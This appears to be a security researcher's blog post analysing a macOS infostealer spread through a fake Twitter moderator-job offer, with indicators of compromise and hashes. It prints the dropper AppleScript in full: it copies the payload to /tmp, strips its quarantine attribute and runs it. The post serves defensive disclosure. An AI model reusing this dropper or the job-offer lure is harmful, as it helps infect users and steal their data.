A new account shot me a DM in Twitter with some malware, so I figured "why not?". Of course the standard procedure applies:
Do you want a job as an admin / moderator? Pays $500 a week!
Sends a malicious link.
Part of the requirement is creating an account through the software after you download it.
Aaaaand of course it's just straight up malware that steals everything. EZPZ.
Let's jump into it.
Info
URL | https[://]runeonline[.]games |
URLScan.io | https://urlscan.io/result/cf8cb6ac-7428-4a21-b182-292e6fcd4a43/ |
URL VT | https://www.virustotal.com/gui/url/7872392c2d96ce74deef786437a1118e4f2e1780f7988ea7d38c7a47ff6b6c68 |
Downloaded File Name | RuneLauncher_v.2.5.dmg |
Downloaded File Hash | 3f5b9f5940173e9fb46b2eff36c9805dc68652ede49c29a6efafaccc540e2a15 |
VT (4/62) | |
DMG File 1 | RuneLauncher |
File 1 Hash | e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511 |
File 1 VT (6/64) | https://www.virustotal.com/gui/file/e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511 |
DMG File 2 | instruction.txt |
File 2 Hash | 71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767 |
File 2 VT (0/61) | https://www.virustotal.com/gui/file/71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767 |
DMG File 3 | An alias to the terminal application. |
First Look
I mounted the "RuneLauncher_v.2.5.dmg" file using:
hdiutil attach RuneLauncher_v.2.5.dmg
and it contained the three files shown above:
instruction.txt (Plain Text)
RuneLauncher (Unix Executable)
Terminal (Alias)
What's inside instruction.txt? Well, I bet you already guessed it; more AppleScript 🎉! And it's not even obfuscated 🙃.
#!/bin/bash
osascript -e 'on run
try
set volumeList to list disks
end try
set setupVolume to ""
try
repeat with vol in volumeList
if vol contains "RuneLauncher" then
set setupVolume to vol
exit repeat
end if
end repeat
end try
if setupVolume is "" then
return
end if
set scriptDir to "/Volumes/" & setupVolume & "/"
set executableName to "RuneLauncher"
set executablePath to scriptDir & executableName
set tmpExecutablePath to "/tmp/" & executableName
try
do shell script "rm -f " & quoted form of tmpExecutablePath
end try
try
do shell script "cp " & quoted form of executablePath & " " & quoted form of tmpExecutablePath
end try
try
do shell script "xattr -c " & quoted form of tmpExecutablePath
end try
try
do shell script "chmod +x " & quoted form of tmpExecutablePath
end try
try
do shell script quoted form of tmpExecutablePath
end try
end run'
So instead of the AppleScript being used to perform the actions right off the bat, it's using it to execute RuneLauncher. Neat! What's inside of RuneLauncher? It is (of course) adhoc signed.
Running the following command, I extract it to grab the binaries:
7z x RuneLauncher
Running it again, I extract it to separate the interior files:
7z x RuneLauncher\~.x64
And now I'm left with this:
At this point, it's time to see how messed up the internals of these files are and whether it'd be easier to approach the sample dynamically or statically. For this, I'm now using a tool called "Hex Fiend" instead of Sublime.
Inside it of is little else other than giant blobs of encoded/encrypted data. It looks like everything may be Base32-encoded on the surface, than potentially some specific strings are used to decrypt it, as just Base32 decoding doesn't give any information up. I ((still)) haven't had time to setup my dynamic analysis environment, which also means I don't have time to walk through this with Binary Ninja and pull values (sadly). But this thing, for sure, is malicious, so stay safe out there! Anything with a Terminal alias inside of it and AppleScript inside a .txt file can't be trusted. 😂
I've updated my Web3/Crypto MacOS malware collection on VirusTotal with it, so feel free to check them out if you're interested in more: https://www.virustotal.com/gui/collection/727abc31926dc18e3fb984679954393c10e9383b1a78fea085254d46bd279cc0/iocs